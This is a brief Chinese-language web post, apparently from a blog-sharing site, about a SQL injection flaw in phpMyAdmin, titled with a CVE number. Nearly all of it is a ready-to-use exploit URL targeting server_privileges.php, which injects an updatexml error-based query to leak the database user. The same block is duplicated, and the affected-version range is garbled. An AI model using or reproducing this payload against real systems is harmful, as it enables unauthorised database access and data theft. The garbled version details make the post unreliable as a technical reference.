影响版本: 4<4.9.4 and 5>5.0.1
前提:已知phpMyadmin的一个用户口令
Payload:
/phpMyAdmin-4.9.2-all-languages/server_privileges.php?ajax_request=true&validate_username=true&username=test%27%20and%20(select%20updatexml(1,concat(0x7e,(SELECT%20user()),0x7e),1))%20--%20
影响版本: 4<4.9.4 and 5>5.0.1
前提:已知phpMyadmin的一个用户口令
Payload:
/phpMyAdmin-4.9.2-all-languages/server_privileges.php?ajax_request=true&validate_username=true&username=test%27%20and%20(select%20updatexml(1,concat(0x7e,(SELECT%20user()),0x7e),1))%20--%20
本文标题:phpMyadmin SQL注入(CVE-2020-0554)
本文链接:https://www.haomeiwen.com/subject/hwwtdhtx.html
网友评论